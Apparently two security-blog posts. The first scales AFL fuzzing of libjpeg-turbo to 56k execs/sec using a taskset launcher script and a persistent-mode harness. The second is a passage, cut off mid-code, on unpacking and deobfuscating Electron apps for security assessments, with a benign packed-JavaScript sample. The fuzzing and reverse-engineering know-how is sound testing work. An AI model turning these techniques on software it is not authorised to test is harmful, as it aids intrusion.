The first thing I’m going to try on almost any new target I look at will be to find a tool that already comes with the source that in some way parses the image. In this case for libjpeg-turbo we can actually use the tool that comes with called djpeg. This is a simple command line utility that takes in a file over stdin or via a command line argument, and produces another output file potentially of another format. Since we know we are going to use AFL, let’s get a basic AFL environment set up. It’s pretty simple, and in our case we’re using afl-2.52b the latest at the time of writing this blog. We’re not using ASAN as we’re looking for best case performance numbers.

pleb@debphi:~/blogging$ wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
--2018-09-16 16:09:11--  http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
Resolving lcamtuf.coredump.cx (lcamtuf.coredump.cx)... 199.58.85.40
Connecting to lcamtuf.coredump.cx (lcamtuf.coredump.cx)|199.58.85.40|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 835907 (816K) [application/x-gzip]
Saving to: ‘afl-latest.tgz’

afl-latest.tgz                                              100%[========================================================================================================================================>] 816.32K   323KB/s    in 2.5s

2018-09-16 16:09:14 (323 KB/s) - ‘afl-latest.tgz’ saved [835907/835907]

pleb@debphi:~/blogging$ tar xf afl-latest.tgz
pleb@debphi:~/blogging$ cd afl-2.52b/
pleb@debphi:~/blogging/afl-2.52b$ make -j256
[*] Checking for the ability to compile x86 code...
[+] Everything seems to be working, ready to compile.
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-gcc.c -o afl-gcc -ldl
set -e; for i in afl-g++ afl-clang afl-clang++; do ln -sf afl-gcc $i; done
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-fuzz.c -o afl-fuzz -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-showmap.c -o afl-showmap -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-tmin.c -o afl-tmin -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-gotcpu.c -o afl-gotcpu -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-analyze.c -o afl-analyze -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-as.c -o afl-as -ldl
ln -sf afl-as as
[*] Testing the CC wrapper and instrumentation output...
unset AFL_USE_ASAN AFL_USE_MSAN; AFL_QUIET=1 AFL_INST_RATIO=100 AFL_PATH=. ./afl-gcc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" test-instr.c -o test-instr -ldl
echo 0 | ./afl-showmap -m none -q -o .test-instr0 ./test-instr
echo 1 | ./afl-showmap -m none -q -o .test-instr1 ./test-instr
[+] All right, the instrumentation seems to be working!
[+] LLVM users: see llvm_mode/README.llvm for a faster alternative to afl-gcc.
[+] All done! Be sure to review README - it's pretty short and useful.

Out of the box AFL gives us some compiler wrappers for gcc and clang, afl-gcc and afl-clang respectively. We’ll use these to build the libjpeg-turbo source so AFL adds instrumentation that is used for coverage and feedback. Which is critical to modern fuzzer operation, especially when just doing byte flipping like AFL does.

Let’s grab libjpeg-turbo and build it:

pleb@debphi:~/blogging$ git clone https://github.com/libjpeg-turbo/libjpeg-turbo
Cloning into 'libjpeg-turbo'...
remote: Counting objects: 13559, done.
remote: Compressing objects: 100% (40/40), done.
remote: Total 13559 (delta 14), reused 8 (delta 1), pack-reused 13518
Receiving objects: 100% (13559/13559), 11.67 MiB | 8.72 MiB/s, done.
Resolving deltas: 100% (10090/10090), done.
pleb@debphi:~/blogging$ mkdir buildjpeg
pleb@debphi:~/blogging$ cd buildjpeg/
pleb@debphi:~/blogging/buildjpeg$ export PATH=$PATH:/home/pleb/blogging/afl-2.52b
pleb@debphi:~/blogging/buildjpeg$ cmake -G"Unix Makefiles" -DCMAKE_C_COMPILER=afl-gcc -DCMAKE_C_FLAGS=-m32 /home/pleb/blogging/libjpeg-turbo/
...
pleb@debphi:~/blogging/buildjpeg$ make -j256
...
[100%] Built target tjunittest-static
pleb@debphi:~/blogging/buildjpeg$ ls
cjpeg           CMakeFiles             CTestTestfile.cmake  jconfig.h     jpegtran         libjpeg.map    libjpeg.so.62.3.0  libturbojpeg.so.0      md5         sharedlib  tjbench-static  tjexampletest      wrjpgcom
cjpeg-static    cmake_install.cmake    djpeg                jconfigint.h  jpegtran-static  libjpeg.so     libturbojpeg.a     libturbojpeg.so.0.2.0  pkgscripts  simd       tjbenchtest     tjunittest
CMakeCache.txt  cmake_uninstall.cmake  djpeg-static         jcstest       libjpeg.a        libjpeg.so.62  libturbojpeg.so    Makefile               rdjpgcom    tjbench    tjexample       tjunittest-static

Woo! We have a libjpeg-turbo built with AFL and instrumented! We now have a ./djpeg which is what we’re going to use to fuzz. We need a test input corpus of JPEGs, however since we’re benchmarking I just picked a single JPEG that is 3.2 KiB in size. We’ll set up AFL and fuzz this with no frills:

pleb@debphi:~/blogging$ mkdir fuzzing
pleb@debphi:~/blogging$ cd fuzzing/
pleb@debphi:~/blogging/fuzzing$ mkdir inputs
... Copy in an input
pleb@debphi:~/blogging/fuzzing$ mkdir outputs
pleb@debphi:~/blogging/fuzzing$ afl-fuzz -h
pleb@debphi:~/blogging/fuzzing$ afl-fuzz -i inputs/ -o outputs/ -- ../buildjpeg/djpeg @@

Now we’re hacking!

Oh wow we're a hacker

It’s important that you keep an eye on exec speed as it can flutter around during different passes, in this case 210-220 is where it seemed to hover around on average. So I’ll be using the 214.4 number from the picture as the baseline for this first test.

Using all your cores

I’ve got some sad news though. This isn’t using anything but a single core. We have a 256 thread machine and we’re using 1/256th of it to fuzz, what a waste of silicon. Sadly there’s no trivial way to spin up AFL so lets just cheat and grab something that does it for us: afl-launch . This requires go but the instructions are pretty clear on how to get it set up and running. It takes effectively the exact same args as afl-fuzz but it takes an -n parameter that spins up multiple jobs for us. Let’s also switch to a ramdisk to decrease thrashing of the disk (doesn’t matter that much anyways due to FS caching):

pleb@debphi:~/blogging/fuzzing$ rm -rf /mnt/ram/outputs/*
pleb@debphi:~/blogging/fuzzing$ ~/go/bin/afl-launch -n 256 -i /mnt/ram/inputs/ -o /mnt/ram/outputs/ -- ../buildjpeg/djpeg @@

And we expect roughly 214 * 64 (number of exec/sec on single core * number of physical cores) = 14k execs/sec. In reality I expect even more than this due to hyperthreading.

pleb@debphi:~/blogging/fuzzing$ ps a | grep afl-fuzz | grep -v grep | wc -l
256
pleb@debphi:~/blogging/fuzzing$ afl-whatsup -s /mnt/ram/outputs/
status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 0 days, 10 hours
         Total execs : 0 million
    Cumulative speed : 4108 execs/sec
       Pending paths : 455 faves, 14932 total
  Pending per fuzzer : 1 faves, 58 total (on average)
       Crashes found : 0 locally unique

Hmm? What? I’m running 256 instances, afl-whatsup confirms that, but I’m only getting 4.1k execs/sec? That’s a 20x speedup running 256 threads!? Hmm, this is no good. We even switched to a ramdisk so we even have an advantage over the single threaded run. Let’s check out that CPU utilization:

Wait what

Actually using all your cores

Okay, so apparently we’re only using 22 threads even though we have 256 processes running. Linux will evenly distribute threads so AFL must be doing something special here. If we just look around for affinity in the AFL codebase we stumble across this:

/* Build a list of processes bound to specific cores. Returns -1 if nothing
   can be found. Assumes an upper bound of 4k CPUs. */

static void bind_to_free_cpu(void) {

  DIR* d;
  struct dirent* de;
  cpu_set_t c;

  u8 cpu_used[4096] = { 0 };
  u32 i;

  if (cpu_core_count < 2) return;

  if (getenv("AFL_NO_AFFINITY")) {

    WARNF("Not binding to a CPU core (AFL_NO_AFFINITY set).");
    return;

  }

  d = opendir("/proc");

  if (!d) {

    WARNF("Unable to access /proc - can't scan for free CPU cores.");
    return;

  }

  ACTF("Checking CPU core loadout...");

  /* Introduce some jitter, in case multiple AFL tasks are doing the same
     thing at the same time... */

  usleep(R(1000) * 250);

  /* Scan all /proc/<pid>/status entries, checking for Cpus_allowed_list.
     Flag all processes bound to a specific CPU using cpu_used[]. This will
     fail for some exotic binding setups, but is likely good enough in almost
     all real-world use cases. */

  while ((de = readdir(d))) {

    u8* fn;
    FILE* f;
    u8 tmp[MAX_LINE];
    u8 has_vmsize = 0;

    if (!isdigit(de->d_name[0])) continue;

    fn = alloc_printf("/proc/%s/status", de->d_name);

    if (!(f = fopen(fn, "r"))) {
      ck_free(fn);
      continue;
    }

    while (fgets(tmp, MAX_LINE, f)) {

      u32 hval;

      /* Processes without VmSize are probably kernel tasks. */

      if (!strncmp(tmp, "VmSize:\t", 8)) has_vmsize = 1;

      if (!strncmp(tmp, "Cpus_allowed_list:\t", 19) &&
          !strchr(tmp, '-') && !strchr(tmp, ',') &&
          sscanf(tmp + 19, "%u", &hval) == 1 && hval < sizeof(cpu_used) &&
          has_vmsize) {

        cpu_used[hval] = 1;
        break;

      }

    }

    ck_free(fn);
    fclose(f);

  }

  closedir(d);

  for (i = 0; i < cpu_core_count; i++) if (!cpu_used[i]) break;

  if (i == cpu_core_count) {

    SAYF("\n" cLRD "[-] " cRST
         "Uh-oh, looks like all %u CPU cores on your system are allocated to\n"
         "    other instances of afl-fuzz (or similar CPU-locked tasks). Starting\n"
         "    another fuzzer on this machine is probably a bad plan, but if you are\n"
         "    absolutely sure, you can set AFL_NO_AFFINITY and try again.\n",
         cpu_core_count);

    FATAL("No more free CPU cores");

  }

  OKF("Found a free CPU core, binding to #%u.", i);

  cpu_aff = i;

  CPU_ZERO(&c);
  CPU_SET(i, &c);

  if (sched_setaffinity(0, sizeof(c), &c))
    PFATAL("sched_setaffinity failed");

}

#endif /* HAVE_AFFINITY */

We can see that this code does some interesting processing on procfs to find which processors are not in use, and then pins to them. Interestingly we never get the “Uh-oh” message saying we’re out of CPUs, and all 256 of our instances are running. The only way this is possible is if AFL is binding multiple processes to the same core. This is possible due to races on the procfs and the CPU masks not getting updated right away, so some delay has to be added between spinning up AFL instances. But we can do better.

We see at the top of this function this functionality can be turned off entirely by setting the AFL_NO_AFFINITY environment variable. Lets do that and then manage the affinities ourselves. We’re also going to drop the afl-launch tool and just do it ourselves.

import subprocess, threading, time, shutil, os

NUM_CPUS = 256

INPUT_DIR  = "/mnt/ram/jpegs"
OUTPUT_DIR = "/mnt/ram/outputs"

def do_work(cpu):
    master_arg = "-M"
    if cpu != 0:
        master_arg = "-S"

    # Restart if it dies, which happens on startup a bit
    while True:
        try:
            sp = subprocess.Popen([
                "taskset", "-c", "%d" % cpu,
                "afl-fuzz", "-i", INPUT_DIR, "-o", OUTPUT_DIR,
                master_arg, "fuzzer%d" % cpu, "--",
                "../buildjpeg/djpeg", "@@"],
                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            sp.wait()
        except:
            pass

        print("CPU %d afl-fuzz instance died" % cpu)

        # Some backoff if we fail to run
        time.sleep(1.0)

assert os.path.exists(INPUT_DIR), "Invalid input directory"

if os.path.exists(OUTPUT_DIR):
    print("Deleting old output directory")
    shutil.rmtree(OUTPUT_DIR)

print("Creating output directory")
os.mkdir(OUTPUT_DIR)

# Disable AFL affinity as we do it better
os.environ["AFL_NO_AFFINITY"] = "1"

for cpu in range(0, NUM_CPUS):
    threading.Timer(0.0, do_work, args=[cpu]).start()

    # Let master stabilize first
    if cpu == 0:
        time.sleep(1.0)

while threading.active_count() > 1:
    time.sleep(5.0)

    try:
        subprocess.check_call(["afl-whatsup", "-s", OUTPUT_DIR])
    except:
        pass

By using taskset when we spawn AFL processes we manually control the core rather than AFL trying to figure out what is not being used as we know what’s not used since we’re launching everything. Further we os.environ["AFL_NO_AFFINITY"] = "1" to make sure AFL doesn’t get control over affinity as we now manage it. We’ve got some other things in here like where we give 1 second of delay after the master instance, we automatically clean up the ouput directory, and call afl-whatsup in a loop. We also restart dead afl-fuzz instances which I’ve observed can happen sometimes when spawning everything at once.

status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 1 days, 0 hours
         Total execs : 6 million
    Cumulative speed : 18363 execs/sec
       Pending paths : 1 faves, 112903 total
  Pending per fuzzer : 0 faves, 441 total (on average)
       Crashes found : 0 locally unique

But it worked

Well that gave us a 4.5x speedup! Look at that CPU utilization!

Optimizing our target for maxium CPU time

We’re now using 100% of all cores. If you’re no htop master you might not know that the red means kernel time on the bars. This means that (eyeballing it) we’re spending about 50% of the CPU time in the kernel. Any time in the kernel is time not spent fuzzing JPEGs. At this point we’ve got AFL doing everything it can, but we’re gonna have to get more creative with our target.

So this is telling us we must be able to find at least a 2x speedup on this target, moving our goal to 40k execs/sec. It’s possible kernel usage is unavoidable, but for something like libjpeg-turbo it would be unreasonable to spend any large amount of time in the kernel anyways. Let’s use everything AFL gives us by using afl persistent mode. This effectively allows you to run multiple fuzz cases in a single instance of the program rather than reverting program state back every fuzz case via clone() or fork(). This can reduce that kernel overhead we’re worried about.

Let’s set up the persistent mode environment by building afl-clang-fast.

pleb@debphi:~/blogging$ cd afl-2.52b/llvm_mode/
pleb@debphi:~/blogging/afl-2.52b/llvm_mode$ make -j8
[*] Checking for working 'llvm-config'...
[*] Checking for working 'clang'...
[*] Checking for '../afl-showmap'...
[+] All set and ready to build.
clang -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  afl-clang-fast.c -o ../afl-clang-fast
ln -sf afl-clang-fast ../afl-clang-fast++
clang++ `llvm-config --cxxflags` -fno-rtti -fpic -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DVERSION=\"2.52b\" -Wno-variadic-macros -shared afl-llvm-pass.so.cc -o ../afl-llvm-pass.so `llvm-config --ldflags`
warning: unknown warning option '-Wno-maybe-uninitialized'; did you mean '-Wno-uninitialized'? [-Wunknown-warning-option]
1 warning generated.
clang -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  -fPIC -c afl-llvm-rt.o.c -o ../afl-llvm-rt.o
[*] Building 32-bit variant of the runtime (-m32)... success!
[*] Building 64-bit variant of the runtime (-m64)... success!
[*] Testing the CC wrapper and instrumentation output...
unset AFL_USE_ASAN AFL_USE_MSAN AFL_INST_RATIO; AFL_QUIET=1 AFL_PATH=. AFL_CC=clang ../afl-clang-fast -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  ../test-instr.c -o test-instr
echo 0 | ../afl-showmap -m none -q -o .test-instr0 ./test-instr
echo 1 | ../afl-showmap -m none -q -o .test-instr1 ./test-instr
[+] All right, the instrumentation seems to be working!
[+] All done! You can now use '../afl-clang-fast' to compile programs.

Now we have an afl-clang-fast binary in the afl-2.52b folder. Let’s rebuild libjpeg-turbo using this

pleb@debphi:~/blogging/buildjpeg$ cmake -G"Unix Makefiles" -DCMAKE_C_COMPILER=afl-clang-fast -DCMAKE_C_FLAGS=-m32 /home/pleb/blogging/libjpeg-turbo/
pleb@debphi:~/blogging/buildjpeg$ make -j256
...
[100%] Built target jpegtran-static
afl-clang-fast 2.52b by <[email protected]>
[100%] Built target jpegtran

So, libjpeg-turbo is a library. Meaning it’s designed to be used from other programs. It’s also one of the most popular libraries for image compression, so surely it’s relatively easy to use. Let’s quickly write up a bare-bones application that loads an image from a provided argument:

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include "jpeglib.h"
#include <setjmp.h>

struct my_error_mgr {
  struct jpeg_error_mgr pub;    /* "public" fields */
  jmp_buf setjmp_buffer;        /* for return to caller */
};

typedef struct my_error_mgr * my_error_ptr;

// Longjmp out on errors
METHODDEF(void)
my_error_exit(j_common_ptr cinfo)
{
  my_error_ptr myerr = (my_error_ptr) cinfo->err;
  longjmp(myerr->setjmp_buffer, 1);
}


// Eat warnings
METHODDEF(void)
emit_message(j_common_ptr cinfo, int msg_level) {}

GLOBAL(int)
read_JPEG_file (char * filename, unsigned char *filebuf, size_t filebuflen)
{
  struct jpeg_decompress_struct cinfo;
  struct my_error_mgr jerr;
  JSAMPARRAY buffer;            /* Output row buffer */
  int row_stride;               /* physical row width in output buffer */
  int fd;
  ssize_t flen;

  fd = open(filename, O_RDONLY);
  if(fd == -1){
    return 0;
  }

  flen = read(fd, (void*)filebuf, filebuflen);
  close(fd);

  if(flen <= 0){
    return 0;
  }

  cinfo.err = jpeg_std_error(&jerr.pub);
  jerr.pub.error_exit = my_error_exit;
  jerr.pub.emit_message = emit_message;

  /* Establish the setjmp return context for my_error_exit to use. */
  if (setjmp(jerr.setjmp_buffer)) {
    jpeg_destroy_decompress(&cinfo);
    return 0;
  }

  jpeg_create_decompress(&cinfo);
  jpeg_mem_src(&cinfo, filebuf, flen);
  (void) jpeg_read_header(&cinfo, TRUE);
  (void) jpeg_start_decompress(&cinfo);
  row_stride = cinfo.output_width * cinfo.output_components;
  buffer = (*cinfo.mem->alloc_sarray)
                ((j_common_ptr) &cinfo, JPOOL_IMAGE, row_stride, 1);

  while (cinfo.output_scanline < cinfo.output_height) {
    (void) jpeg_read_scanlines(&cinfo, buffer, 1);
  }

  (void) jpeg_finish_decompress(&cinfo);
  jpeg_destroy_decompress(&cinfo);
  return 1;
}

int main(int argc, char *argv[]) {
  void *filebuf = NULL;
  const size_t filebuflen = 32 * 1024;

  if(argc != 2) { fprintf(stderr, "Nice usage noob\n"); return -1; }

  filebuf = malloc(filebuflen);
  if(!filebuf) {
    return -1;
  }

  while(__AFL_LOOP(100000)) {
    read_JPEG_file(argv[1], filebuf, filebuflen);
  }
}

This can be built with:

AFL_PATH=/home/pleb/blogging/afl-2.52b afl-clang-fast -O2 -m32 example.c -I/home/pleb/blogging/buildjpeg -I/home/pleb/blogging/libjpeg-turbo /home/pleb/blogging/buildjpeg/libjpeg.a

You can see the code this was derived from with more comments here which I modified to my specific needs and removed almost all comments to keep code as small as possible. It’s also relatively simple to read based off function names.

We made a few changes to the code. We removed all output from the code. It should not print to the screen for warnings or errors, it should not save any files, it should only parse the input. It then will correctly return up via setjmp()/longjmp() on errors and allow us to quickly move to the next case.

You can see we introduced __AFL_LOOP here. This is a special meaning to running this code but only under afl-fuzz. When running it uses signals to notify that it is done with a fuzz case and needs a new one. This loop we set at a limit of 100,000 iterations before tearing down the child and restarting. It’s pretty simple and pretty clean. So now hopefully our syscall usage is down. Let’s check that first.

We’re going to run this new single threaded and verify it’s running as persistent:

pleb@debphi:~/blogging/jpeg_fuzz$ afl-fuzz -i /mnt/ram/jpegs/ -o /mnt/ram/outputs/ -- ./a.out @@
...
[+] Persistent mode binary detected. <<< WOO!

Yay

Woo, it’s just a little under 2x faster than the initial single threaded djpeg (we’re running this one ramdisk, but I verified that was not relevant here). It’s just running faster because we’re doing less misc things in the kernel and the code itself.

So AFL tells us that it is persistent, but let’s triple check by running strace on the fuzz process:

ps aux | grep "R.*a.out" | grep -v grep | awk '{print "-p " $2}' | xargs strace

It’s a bit ugly but we strace any actively running a.out task, since it’s crude it might take a few tries to get attached to the right one but I’m no bash pro.

We can see we get a repeating pattern:

openat(AT_FDCWD, "/mnt/ram/outputs//.cur_input", O_RDONLY) = 3
read(3, "\377\330\377\340\0\20JFIF\0\1\1\0\0\1\0\1\0\0\377\333\0C\0\5\3\4\4\4\3\5"..., 32768) = 3251
close(3)                                = 0
rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [], 8) = 0
getpid()                                = 53786
gettid()                                = 53786
tgkill(53786, 53786, SIGSTOP)           = 0
--- SIGSTOP {si_signo=SIGSTOP, si_code=SI_TKILL, si_pid=53786, si_uid=1000} ---
--- stopped by SIGSTOP ---
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCONT {si_signo=SIGCONT, si_code=SI_USER, si_pid=53776, si_uid=1000} ---
openat(AT_FDCWD, "/mnt/ram/outputs//.cur_input", O_RDONLY) = 3
read(3, "\377\330\377\340\0\20JFIF\0\1\1\0\0\1\0\1\0\0\377\333\0C\0\5\3\4\4\4\3\5"..., 32768) = 3251
close(3)                                = 0
rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [], 8) = 0
getpid()                                = 53786
gettid()                                = 53786
tgkill(53786, 53786, SIGSTOP)           = 0
--- SIGSTOP {si_signo=SIGSTOP, si_code=SI_TKILL, si_pid=53786, si_uid=1000} ---
--- stopped by SIGSTOP ---
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCONT {si_signo=SIGCONT, si_code=SI_USER, si_pid=53776, si_uid=1000} ---

We see the openat to open, read to read the file, and close when it’s done parsing. So what is the rt_sigprocmask() and beyond? Well in persistent mode AFL uses this to communicate when fuzz cases are done. You can actually find this code in afl-2.52b/llvm_mode/afl-llvm-rt.o.c. There’s a descriptive comment:

    /* In persistent mode, the child stops itself with SIGSTOP to indicate
       a successful run. In this case, we want to wake it up without forking
       again. */

This means that the rt_sigprocmask() and beyond is out of our control. But other than that we’re doing the bare minimum to read a file by doing open, read, and close. Nothing else. We’re running tens of thousands of fuzz cases in a single instance of this program without having to exit() out and fork()!

Alright! Let’s put it all together and fuzz with this new binary on all cores!

status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 1 days, 1 hours
         Total execs : 20 million
    Cumulative speed : 56003 execs/sec
       Pending paths : 1 faves, 122669 total
  Pending per fuzzer : 0 faves, 479 total (on average)
       Crashes found : 0 locally unique

Woo 56k per second! More than the 2x we were expecting from the custom written target. And I’ll save you another htop image and just tell you that now only about 8% of CPU time is spent in the kernel. Given we’re doing 7 syscalls per fuzz case, that means we’re doing about 400k per second, which still is fairly high but most of the syscalls are due to AFL and not us so they’re out of our control.

Conclusion

It’s pretty easy to get stuck thinking tools work out of the box. People usually worry about scaling at the level of “if it’s possible” rather than “is it actually doing more work”. It’s important to note that it’s very easy to run 64 instances of a tool and end up getting very little performance gain. In the world of fuzzing you usually should be able to scale linearly with cores, so if you’re only getting 1/2 efficiency it’s probably time to settle in and figure out if it’s in your control or not.

We were able to go from naive single-core AFL usage with 214 execs/sec, to “just run 256 AFLs” at 4k/sec, to doing some optimizations to get us to 56k/sec. All within a few hours of work. It’d be a shame if we would have just taken the 4k/sec and run with it, as we would be wasting almost all of our CPU.

Extra

This is my first blog, so please let me know anything you want more or less of. Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Shoutouts

Shoutouts to @ScottyBauer1 and @marcograss on Twitter for giving me AFL tips and tricks for getting these numbers up

Instrumenting Electron Apps for Security Testing

18 July 2018 at 22:00

Instrumenting Electron-based applications

With the increasing popularity of the Electron Framework, we have created this post to summarize a few techniques which can be used to instrument an Electron-based application, change its behavior, and perform in-depth security assessments.

Electron and processes

The Electron Framework is used to develop multi-platform desktop applications with nothing more than HTML, JavaScript and CSS. It has two core components: Node.js and the libchromiumcontent module from the Chromium project.

In Electron, the main process is the process that runs package.json’s main script. This component has access to Node.js primitives and is responsible for starting other processes. Chromium is used for displaying web pages, which are rendered in separate processes called renderer processes.

Unlike regular browsers where web pages run in a sandboxed environment and do not have access to native system resources, Electron renderers have access to Node.js primitives and allow lower level integration with the underlying operating system. Electron exposes full access to native Node.js APIs, but it also facilitates the use of external Node.js NPM modules.

As you might have guessed from recent public security vulnerabilities, the security implications are substantial since JavaScript code can access the filesystem, user shell, and many more primitives. The inherent security risks increase with the additional power granted to application code. For instance, displaying arbitrary content from untrusted sources inside a non-isolated renderer is a severe security risk. You can read more about Electron Security, hardening and vulnerabilities prevention in the official Security Recommendations document.

Unpacking the ASAR archive

The first thing to do to inspect the source code of an Electron-based application is to unpack the application bundle (.asar file). ASAR archives are a simple tar-like format that concatenates files into a single one.

First locate the main ASAR archive of our app, usually named core.asar or app.asar.

Once we have this file we can proceed with installing the asar utility: npm install -g asar

and extract the whole archive: asar extract core.asar destinationfolder

At its simplest version, an Electron application includes three files: index.js, index.html and package.json.

Our first target to inspect is the package.json file, as it holds the path of the file responsible for the “entry point” of our application:

{
  "name": "Example App",
  "description": "Core App",
  "main": "app/index.js",
  "private": true,
}

In our example the entry point is the file called index.js located within the app folder, which will be executed as the main process. If not specified, index.js is the default main file. The file index.html and other web resources are used in renderer processes to display actual content to the user. A new renderer process is created for every browserWindow instantiated in the main process.

In order to be able to follow functions and methods in our favorite IDE, it is recommended to resolve the dependencies of our app:

npm install

We should also install Devtron, a tool (built on top of the Chrome Developer Tools) to inspect, monitor and debug our Electron app. For Devtron to work, NodeIntegration must be on.

npm install --save-dev devtron

Then, run the following from the Console tab of the Developer Tools

require('devtron').install()

Dealing with obfuscated javascript

Whenever the application is neither minimized nor obfuscated, we can easily inspect the code.

'use strict';

Object.defineProperty(exports, "__esModule", {
  value: true
});
exports.startup = startup;
exports.handleSingleInstance = handleSingleInstance;
exports.setMainWindowVisible = setMainWindowVisible;

var _require = require('electron'),
    Menu = _require.Menu;

var mainScreen = void 0;
function startup(bootstrapModules) {
[ -- cut -- ]

In case of obfuscation, there are no silver bullets to unfold heavily manipulated javascript code. In these situations, a combination of automatic tools and manual reverse engineering is required to get back to the original source.

Take this horrendous piece of JS as an example:

eval(function(c,d,e,f,g,h){g=function(i){return(i<d?'':g(parseInt(i/d)))+((i=i%d)>0x23?String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](i+0x1d):i['\x74\x6f\x53\x74\x72\x69\x6e\x67'](0x24));};while(e--){if(f[e]){c=c['\x72\x65\x70\x6c\x61\x63\x65'](new RegExp('\x5c\x62'+g(e)+'\x5c\x62','\x67'),f[e]);}}return c;}('\x62\x20\x35\x3d\x5b\x22\x5c\x6f\x5c\x38\x5c\x70\x5c\x73\x5c\x34\x5c\x63\x5c\x63\x5c\x37\x22\x2c\x22\x5c\x72\x5c\x34\x5c\x64\x5c\x74\x5c\x37\x5c\x67\x5c\x6d\x5c\x64\x22\x2c\x22\x5c\x75\x5c\x34\x5c\x66\x5c\x66\x5c\x38\x5c\x71\x5c\x34\x5c\x36\x5c\x6c\x5c\x36\x22\x2c\x22\x5c\x6e\x5c\x37\x5c\x67\x5c\x36\x5c\x38\x5c\x77\x5c\x34\x5c\x36\x5c\x42\x5c\x34\x5c\x63\x5c\x43\x5c\x37\x5c\x76\x5c\x34\x5c\x41\x22\x5d\x3b\x39\x20\x6b\x28\x65\x29\x7b\x62\x20\x61\x3d\x30\x3b\x6a\x5b\x35\x5b\x30\x5d\x5d\x3d\x39\x28\x68\x29\x7b\x61\x2b\x2b\x3b\x78\x28\x65\x2b\x68\x29\x7d\x3b\x6a\x5b\x35\x5b\x31\x5d\x5d\x3d\x39\x28\x29\x7b\x79\x20\x61\x7d\x7d\x62\x20\x69\x3d\x7a\x20\x6b\x28\x35\x5b\x32\x5d\x29\x3b\x69\x2e\x44\x28\x35\x5b\x33\x5d\x29',0x28,0x28,'\x7c\x7c\x7c\x7c\x78\x36\x35\x7c\x5f\x30\x7c\x78\x32\x30\x7c\x78\x36\x46\x7c\x78\x36\x31\x7c\x66\x75\x6e\x63\x74\x69\x6f\x6e\x7c\x5f\x31\x7c\x76\x61\x72\x7c\x78\x36\x43\x7c\x78\x37\x34\x7c\x5f\x32\x7c\x78\x37\x33\x7c\x78\x37\x35\x7c\x5f\x33\x7c\x6f\x62\x6a\x7c\x74\x68\x69\x73\x7c\x4e\x65\x77\x4f\x62\x6a\x65\x63\x74\x7c\x78\x33\x41\x7c\x78\x36\x45\x7c\x78\x35\x39\x7c\x78\x35\x33\x7c\x78\x37\x39\x7c\x78\x36\x37\x7c\x78\x34\x37\x7c\x78\x34\x38\x7c\x78\x34\x33\x7c\x78\x34\x44\x7c\x78\x36\x44\x7c\x78\x37\x32\x7c\x61\x6c\x65\x72\x74\x7c\x72\x65\x74\x75\x72\x6e\x7c\x6e\x65\x77\x7c\x78\x32\x45\x7c\x78\x37\x37\x7c\x78\x36\x33\x7c\x53\x61\x79\x48\x65\x6c\x6c\x6f'['\x73\x70\x6c\x69\x74']('\x7c')));

It can be manually turned into:

eval(function (c, d, e, f, g, h) {
    g = function (i) {
